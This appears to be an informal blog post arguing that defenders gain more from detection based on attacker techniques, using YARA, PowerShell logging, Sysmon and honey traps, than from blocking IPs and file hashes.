Have you played whack a security, like whack a mole but this game is played by EDR, Proxy and Firewall. How to play is easy you start blocking stuff instead of remediating, ironically like the original game they keep popping up.
Port scan on the perimeter FW? block the IP
Log4J scans on the WAF? block it
Beaconing on the infrastructure? block the C2
Advisory came in for Mimikatz? block the hash
But would it really make the security posture better in your organization? other than bandage underline issue which is a ticking bomb to be exploited.
Instead of the traditional IP(s) and Hashes blocking we can actually start focus on what matters, before that, why does these IOC are so unimportant? for that we have to look at the Pyramid of pain.
As you can see the the IP(s), Hashes and domains will be easiest to change. Specially when you are a medium to big business with EDRs, Firewalls, IPS and a SOC looking for anything and everything suspicious off by a letter. For an attacker to get in through all this it has to be an targeted attack.. and the hashes changing are a matter of recompiling the binary.
As you can see there are 400K+ automated web scanning IP(s) per day(Taken from Greynoise.io). These will not get past any reputable and updated IPS(depending on the settings) and this is the time defenders should be investing setting TTP based detection.
Attack that matters and will compromise a network will not get caught by the automated security solutions that’s when we need manual interception. We disregard these detection methods because they are not very convenient but trust me these are well worth the time.
So what can we utilize to further enhance our Cyber arsenal? one of the best solutions are YARA, this can be used to detect common malwares to lazy zero day attacks. Sounds fun? I’ll do some YARA basic tutorial later.
Next weapon is Powershell/CMD logs, this might sound as very obvious but you’ll be surprised how much people will care about EPS to drop these logs and in turn lose the ability to do any effective level 3 investigation on an incident.
Third is Sysmon, which we can use to detect evil in depth including cobalt strike the red teamers best friend.
Deception comes fourth, set up honey traps and watch them close, like a honey admin account a juicy honey file to attract an attacker who is already in the network
Why set these traps up? By creating detections on TTPs and patterns you catch more than the intended culprit as an example you can watch this video https://www.youtube.com/watch?v=borfuQGrB8g&t=994s to get an idea what I’m saying from Chad Tilbery himself.
Attackers are moving forward and we can’t hide forever behind the parameter. Its high time we stop taking knives to a lightsaber fight and give a push back, in the end what matters is keeping the assets secured not having a 233222882 IP blocklist.